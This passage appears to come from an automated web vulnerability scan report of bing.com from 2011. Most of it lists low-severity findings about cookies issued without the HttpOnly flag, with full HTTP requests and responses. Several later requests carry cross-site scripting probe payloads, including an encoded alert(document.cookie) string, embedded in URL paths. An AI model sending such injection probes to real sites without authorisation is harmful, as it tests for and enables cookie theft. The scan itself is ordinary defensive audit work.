Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=819; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gm3vtmq19cv3yz780quprn4otsl_VID-z1oq4m4dn99d87yz72fovekggbn1v_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:12 GMT; Path=/travel
Set-Cookie: JSESSIONID=2C453B42A8BD6A784D623C2DF0E8BB7A; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3F8AAA80A722410C8B09878099EDA1CA; domain=.bing.com; path=/
Content-Length: 87698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

3.2. http://www.bing.com/travel/content/search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:19 GMT
Content-Length: 22048
Connection: close
Set-Cookie: JSESSIONID=7EB8619940D62EA6532C729CCECB1A45; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3156FC6FA1B4456BB9BC9890E342EC52; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

   

...[SNIP]...

3.3. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-los-angeles.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-los-angeles.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=10; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-3n2vnipb2oiulyz4dk98nomu7t6s_VID-2999kjki8gjlyz46o65lm9u4oc6_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:33 GMT; Path=/travel
Set-Cookie: JSESSIONID=A0A8F410795893A332A965C69339FF7E; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3FA678BC8CC54FFDB405305453C54626; domain=.bing.com; path=/
Content-Length: 134700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

3.4. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/weekend-deals-flight-deals.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/weekend-deals-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=8; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-2n3vc7stv0gusyz5ai187p3t99ue_VID-2rvgvj2qaejf8yz78uik5p44jda5_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:26 GMT; Path=/travel
Set-Cookie: JSESSIONID=D94BD82022034E3E99FAD80B6425BC45; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=7EF6DBEDCE444E9D9CD7ABFBFF0883A1; domain=.bing.com; path=/
Content-Length: 116517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

3.5. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/las-vegas-nevada-trips-1003502
Date: Fri, 11 Feb 2011 21:46:19 GMT
Connection: close
Set-Cookie: lbc=18; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z7s38rpfkercl2yz74rb2hu9cnuco_VID-z1n8ppi7nv5f10yz79ofvl7lheql4_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:19 GMT; Path=/travel
Set-Cookie: JSESSIONID=B5BCC216FD00F37E72162E209E5DC133; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460779; domain=.bing.com; path=/
Set-Cookie: _SS=SID=998AC92DF8DE4176A8D10B5E59C5D155; domain=.bing.com; path=/


3.6. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/orlando-florida-hotels-hostels-motels-1004643 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/orlando-florida-trips-1004643
Date: Fri, 11 Feb 2011 21:46:20 GMT
Connection: close
Set-Cookie: lbc=914; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gavb6tgt9cj3yz537ou28tfef9i_VID-3hj6nr643agpayz6dbfcgvh3fvaj_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:20 GMT; Path=/travel
Set-Cookie: JSESSIONID=E95235E963A2DF8E29889E5BBD935FF3; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:20 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460780; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8C47D5A8725040C1BB26FE4119092907; domain=.bing.com; path=/


3.7. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:49 GMT
Content-Length: 27957
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:49 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D112E558C1254059A8053EF8937619A6; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

3.8. http://www.bing.com/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /browse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F3588EE7150F4A06A38A556D2979D3C1; domain=.bing.com; path=/
Content-Length: 39120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

3.9. http://www.bing.com/events/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:48 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=48D2324963F04E158870DD7D33820F4D; domain=.bing.com; path=/
Content-Length: 68849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

3.10. http://www.bing.com/images/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /images/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/images
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=62FB203ABE6B4340BB2B5B957921B4A1; domain=.bing.com; path=/
Content-Length: 61264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

3.11. http://www.bing.com/local

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _HOP=; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.bing.com:80/local/
X-BM-TraceID: c2fe4ba620f6480b9d5cb06a42abadfc
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _HOP=I=1&TS=1297463871; domain=.bing.com; path=/
Content-Length: 146

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bing.com:80/local/">here</a>.</h2>
</body></html>

3.12. http://www.bing.com/local/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=I=1&TS=1297463870

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: d9d8131b7c4346e5aa71689035bb388d
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001201
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 26774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.13. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: f4d43589310840319542d23ff07183eb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js
Content-Length: 18141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.14. http://www.bing.com/local/aa461'-alert(&/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(&/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://burp/show/24
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _HOP=I=1&TS=1297461512; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 3429946a5cf34aa49767b210cdf94acb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(&
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 17629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.15. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
